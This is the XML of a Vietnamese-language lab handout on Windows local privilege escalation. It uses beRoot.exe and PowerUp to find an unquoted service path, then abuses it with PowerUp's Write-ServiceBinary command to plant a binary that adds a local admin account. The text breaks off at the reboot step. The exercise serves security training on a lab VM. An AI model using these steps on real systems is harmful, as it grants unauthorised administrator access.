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EA19" w14:textId="29954F40" w:rsidR="00876E16" w:rsidRDefault="007E5117" w:rsidP="00431D3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab 3.1: Window Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826E811" w14:textId="7F95D557" w:rsidR="007E5117" w:rsidRDefault="007E5117" w:rsidP="007E5117">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F1DDD" w14:textId="543706A9" w:rsidR="007E5117" w:rsidRDefault="007E5117" w:rsidP="007E5117">
      <w:r>
        <w:t>Trong bài lab này ta sẽ sử dụng beRoot.exe và PowerUp để tìm cách leo thang đặc quyền cục bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED31579" w14:textId="1C52336A" w:rsidR="007E5117" w:rsidRDefault="007E5117" w:rsidP="007E5117">
      <w:r>
        <w:t>Ta sẽ tận dụng vấn đề cấu hình dịch vụ của Windows để leo thang đặc quyền cục bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240984FD" w14:textId="527986D6" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F9CE76" w14:textId="5360C8A0" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:r>
        <w:t>Máy ảo sử dụng: Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C55F29" w14:textId="4023C6DE" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544AF58E" w14:textId="6613C73D" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Đăng nhập vào windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7385B93D" w14:textId="5424E124" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:r>
        <w:t>Đầu tiên ta cần đăng xuất windows. Vào start, nhấp vào hình avatar rồi chọn “Sign out”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA33D37" w14:textId="4663934E" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7516EB67" wp14:editId="0B51C6FB">
            <wp:extent cx="6124575" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1955383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3376" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6124575" cy="4124325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A683F7" w14:textId="164C3774" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:r>
        <w:t>Sau đó đăng nhập lại sử dụng tài khoản: Username: notadmin Password: notadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA27A95" w14:textId="5CA22270" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:r>
        <w:t>Đây là tài khoản user thông thường không có đặc quyền admin. Chúng ta sẽ không sử dụng tài khoản sec560 vì nó là tài khoản đã có đặc quyền admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7FD51" w14:textId="29E09F87" w:rsidR="00A8123D" w:rsidRDefault="00A8123D" w:rsidP="0074321A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2954D5B6" wp14:editId="34930EB9">
            <wp:extent cx="6858000" cy="3378835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1391866813" name="Picture 1" descr="A login screen with a white circle and a black circl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6813" name="Picture 1" descr="A login screen with a white circle and a black circle with a white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3378835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="271B3B6F" w14:textId="161A89C1" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Chạy beRoot.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501603AE" w14:textId="228CC25C" w:rsidR="0074321A" w:rsidRDefault="0074321A" w:rsidP="0074321A">
      <w:r>
        <w:t xml:space="preserve">Công cụ đầu tiên chúng ta sử dụng để leo thang đặc quyền chính là beRoot.exe. Để chạy beRoot.exe, ta khởi động command prompt và chạy câu lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00A8123D">
        <w:t>sau (output có thể có một số lỗi, đừng lo lắng về vấn đề này)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF5350" w14:textId="2B4A7D84" w:rsidR="00A8123D" w:rsidRDefault="00436B84" w:rsidP="00436B84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BE05FF" wp14:editId="0BF8E7B3">
            <wp:extent cx="5534025" cy="5619750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1952723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3071" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5534025" cy="5619750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CEB3A" w14:textId="0B215773" w:rsidR="00436B84" w:rsidRDefault="00436B84" w:rsidP="00436B84">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra kết quả sau khi chạy beroot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AAB35B" w14:textId="3C7754EE" w:rsidR="00436B84" w:rsidRDefault="00436B84" w:rsidP="00436B84">
      <w:r>
        <w:t>beRoot.exe ngay lập tức phản hồi và cho ta thấy một số vấn đề xảy ra khi leo thang đặc quyền. Nó sẽ xác định sự cố đường dẫn dịch vụ unquoted với một dịch vụ có tên là Video Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B78508" w14:textId="710626AC" w:rsidR="00436B84" w:rsidRDefault="00436B84" w:rsidP="00436B84">
      <w:r>
        <w:t>Địa chỉ của dịch vụ là C:\Program Files\VideoStream\1337 Log\checklog.exe, nhưng ffuowngf dẫn nhị phân của dịch vụ không bao gồm dấu ngoặc kép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BDFB70" w14:textId="3473BA57" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="00436B84">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C07D50" wp14:editId="31943A82">
            <wp:extent cx="5648325" cy="3924300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1481696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6106" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5648325" cy="3924300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BF6B8" w14:textId="5F40F185" w:rsidR="00436B84" w:rsidRDefault="00436B84" w:rsidP="00436B84">
      <w:r>
        <w:t>Việc thiếu dấu ngoặc kép sẽ là tin tốt cho những kẻ tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA5714" w14:textId="12C0EBE2" w:rsidR="00436B84" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Chạy PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58C1E7" w14:textId="25B5828C" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r w:rsidRPr="00660C90">
        <w:t>Bây giờ hãy thử tập lệnh PowerShell PowerUp.ps1. PowerUp hiện là một phần của PowerShell Empire và là một trong những cơ chế chính được sử dụng để thực hiện leo thang đặc quyền cục bộ. Đây là tập lệnh PowerShell thuần túy và do đó có cơ hội chạy trên máy mục tiêu tốt hơn beRoot.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13B44E" w14:textId="0109FDA3" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r w:rsidRPr="00660C90">
        <w:t xml:space="preserve">Để khởi chạy PowerUp.ps1, </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00660C90">
        <w:t xml:space="preserve"> mở PowerShell và chạy các lệnh sau. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sau đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00660C90">
        <w:t>nhấn R để chạy tập lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2F234" w14:textId="5820C873" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB6C781" wp14:editId="4B9DF796">
            <wp:extent cx="6858000" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2111141204"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1204" name="Picture 1" descr="A computer screen shot of a blue screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1835150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B0E05" w14:textId="5FD83293" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r>
        <w:t>Bây giờ ta chạy kiểm tra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508912EB" w14:textId="42C6779E" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E7AE75" wp14:editId="7B4A3351">
            <wp:extent cx="6858000" cy="3759200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1864136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36508" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3759200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F9722" w14:textId="5D771B4F" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r>
        <w:t>PowerUp sẽ tìm được những thông tin mà beRoot không tìm được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1430DCDC" w14:textId="4BFBCD2B" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra kết quả PowerUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC6FA2" w14:textId="12CD8BB6" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve">PowerUp sẽ </w:t>
      </w:r>
      <w:r>
        <w:t>trả về</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve"> một số kết quả thú vị: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE363A8" w14:textId="041A2D33" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve">Đường dẫn dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:t>unquoted</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve"> cho dịch vụ Video Stream (đ</w:t>
      </w:r>
      <w:r>
        <w:t>ã được</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve"> BeRoot.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phát hiện trước đó</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472FAA7" w14:textId="77777777" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve">Một số lỗ hổng chiếm quyền điều khiển DLL có thể có trong thư mục %PATH% </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A068B3F" w14:textId="77777777" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve">Một số lỗ hổng liên quan đến các quyền và thực thi dịch vụ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33743193" w14:textId="77777777" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t>ết quả của cả beRoot.exe và PowerUp luôn cần</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kiểm tra</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t xml:space="preserve"> thủ công, chẳng hạn như đôi khi chúng hiểu sai các quyền lồng nhau. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B853E" w14:textId="6FCAAC60" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:r>
        <w:t>Bây giờ ta h</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE27A5">
        <w:t>ãy thử khai thác các vấn đề được báo cáo!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD749A" w14:textId="38D15A57" w:rsidR="006A28ED" w:rsidRDefault="006A28ED" w:rsidP="006A28ED">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra dịch vụ Video Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D2589" w14:textId="29E8C57C" w:rsidR="006A28ED" w:rsidRDefault="000767F5" w:rsidP="006A28ED">
      <w:r>
        <w:t xml:space="preserve">Mở services.msc từ cmd beRoot </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91BF9A" w14:textId="25614752" w:rsidR="000767F5" w:rsidRDefault="000767F5" w:rsidP="006A28ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF9D634" wp14:editId="1F8833E0">
            <wp:extent cx="6858000" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1045281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1351" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F82A56" w14:textId="493E475C" w:rsidR="000767F5" w:rsidRDefault="000767F5" w:rsidP="006A28ED">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tìm đến service Video Stream và double click, ta sẽ thấy chi tiết về dịch vụ này. Để ý sẽ thấy Path to executable không có ngoặc kép bao quanh nó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE20B07" w14:textId="0BFAE3A7" w:rsidR="000767F5" w:rsidRDefault="000767F5" w:rsidP="006A28ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32FC3EC8" wp14:editId="1F689ECF">
            <wp:extent cx="6858000" cy="5060315"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="183620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6940" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="5060315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0C7CF" w14:textId="73E1CBF8" w:rsidR="000767F5" w:rsidRDefault="000767F5" w:rsidP="000767F5">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Khai thác lỗ hổng sử dụng PowerUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E4D6A" w14:textId="77777777" w:rsidR="000767F5" w:rsidRDefault="000767F5" w:rsidP="000767F5">
      <w:r w:rsidRPr="00B42AA6">
        <w:t xml:space="preserve">PowerUp cung cấp một cách thuận tiện để </w:t>
      </w:r>
      <w:r>
        <w:t>tận dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00B42AA6">
        <w:t xml:space="preserve"> các lỗ hổng đã được xác định. Nếu xem lại các mục được PowerUp báo cáo, bạn sẽ nhận thấy rằng nó bao gồm AbuseFunction, cung cấp cú pháp sao chép-dán dễ dàng để cố gắng khai thác các vấn đề đã được xác định. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2CAFA6" w14:textId="1712BE64" w:rsidR="000767F5" w:rsidRDefault="000767F5" w:rsidP="000767F5">
      <w:r w:rsidRPr="00B42AA6">
        <w:t xml:space="preserve">Để thử điều này đối với dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:t>Video Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00B42AA6">
        <w:t>, chúng tôi cần cuộn lên một chút đến một số kết quả đầu tiên và sao chép AbuseFunction được</w:t>
      </w:r>
      <w:r w:rsidR="00706A25">
        <w:t xml:space="preserve"> báo cáo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B42AA6">
        <w:t>: Write-ServiceBinary -ServiceName 'Video Stream' -Path &lt;HijackPath&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470907CF" w14:textId="19963DD2" w:rsidR="00706A25" w:rsidRDefault="00706A25" w:rsidP="000767F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33CE51EB" wp14:editId="0D2979CB">
            <wp:extent cx="5772150" cy="2105025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1916704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4987" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5772150" cy="2105025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4A582" w14:textId="073D1F26" w:rsidR="000767F5" w:rsidRDefault="00706A25" w:rsidP="00706A25">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Sửa đổi HijackPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A997C" w14:textId="2A446959" w:rsidR="00706A25" w:rsidRDefault="00706A25" w:rsidP="00706A25">
      <w:r w:rsidRPr="00D2437A">
        <w:t>Vì tệp thực thi dịch vụ thực tế nằm trong thư mục C:\Program Files\VideoStream\1337 Log\ và không có khoảng trống xung quanh đường dẫn đầy đủ, Windows cũng sẽ cố gắng thực thi C:\Program.exe hoặc C:\Program Files\VideoStream\1337.exe .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106773E6" w14:textId="5CAB7850" w:rsidR="00706A25" w:rsidRDefault="00706A25" w:rsidP="00706A25">
      <w:r w:rsidRPr="00D2437A">
        <w:t xml:space="preserve">Bây giờ chúng ta hãy </w:t>
      </w:r>
      <w:r>
        <w:t>chỉnh sửa</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2437A">
        <w:t xml:space="preserve"> "HijackPath" và trỏ nó vào một tệp thực thi có thể được viế</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2437A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3FB992" w14:textId="49F95669" w:rsidR="00706A25" w:rsidRDefault="00432AFC" w:rsidP="00706A25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D74C837" wp14:editId="6222121A">
            <wp:extent cx="6858000" cy="917575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="198129921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99213" name="Picture 1" descr="A blue screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="917575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D5E03" w14:textId="5EE6CB2C" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00706A25">
      <w:r w:rsidRPr="00661449">
        <w:t>Lệnh PowerUp ở trên sẽ ghi một tệp thực thi độc hại ở vị trí sau</w:t>
      </w:r>
      <w:r w:rsidR="00203A84">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00661449">
        <w:t xml:space="preserve"> Do chạy AbuseFunction , bạn sẽ nhận thấy rằng tệp thực thi được viết bởi PowerShell sẽ tạo một ngườ</w:t>
      </w:r>
      <w:r>
        <w:t>i dùng tên là john và pass: Password123!</w:t>
      </w:r>
      <w:r w:rsidRPr="00661449">
        <w:t xml:space="preserve">. Sau đó, người dùng này sẽ được thêm vào nhóm quản trị viên </w:t>
      </w:r>
      <w:r>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidRPr="00661449">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CAC3B" w14:textId="4E47602E" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>Reboot computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC73DA" w14:textId="7F21077F" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:r>
        <w:t>Ta cần x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC57C4">
        <w:t>ác minh xem tệp C:\Program Files\VideoStream\1337.exe có tồn tại hay không. Nếu đúng như vậy thì bây giờ chúng ta cần khởi động lại dịch vụ để tệp thực thi được chạy dưới NT AUTHORITY\SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79092132" w14:textId="1A84A957" w:rsidR="00432AFC" w:rsidRDefault="00432AFC" w:rsidP="00432AFC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E6121A1" wp14:editId="1F541214">
            <wp:extent cx="6429375" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="907036220" name="Picture 1" descr="A screenshot of a video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6220" name="Picture 1" descr="A screenshot of a video stream&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
